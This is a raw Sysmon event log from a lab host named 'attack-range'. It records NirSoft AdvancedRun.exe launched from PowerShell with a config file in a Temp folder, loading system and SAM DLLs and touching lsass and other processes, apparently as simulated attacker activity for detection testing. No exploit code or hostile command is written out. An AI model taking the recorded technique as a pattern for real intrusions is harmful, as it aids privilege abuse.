20:17:12.842{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078549Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.841{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078548Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.841{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.840{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078546Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.840{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078545Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.838{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.837{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.836{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.836{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.836{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004078540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.825{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004078539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.823{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004078538Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.817{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004078337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:58.571{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 734700x80000000000000004078319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:56.022{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\edputil.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=913C76FC95CE8167FAB1E55D697F3B7B,SHA256=9D82F63627DCD5F186CC60A48B412A03DFA8C6FB63426A892A110751966390A7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:46.968{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004078267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.703{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004078266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.690{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004078265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.684{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004078264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.684{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004078263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.679{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004078262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.679{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004078261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.676{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004078260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.675{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.672{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.671{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004078255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.670{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004078254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.670{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004078253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.670{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004078252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:16:44.666{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004078251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.666{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004078250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:16:44.666{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004078249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.665{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004078248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.662{834264DD-DAE6-61EA-0D00-000000002702}8762300C:\Windows\system32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004078247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:44.659{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004078222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.224{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.224{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.224{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.218{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 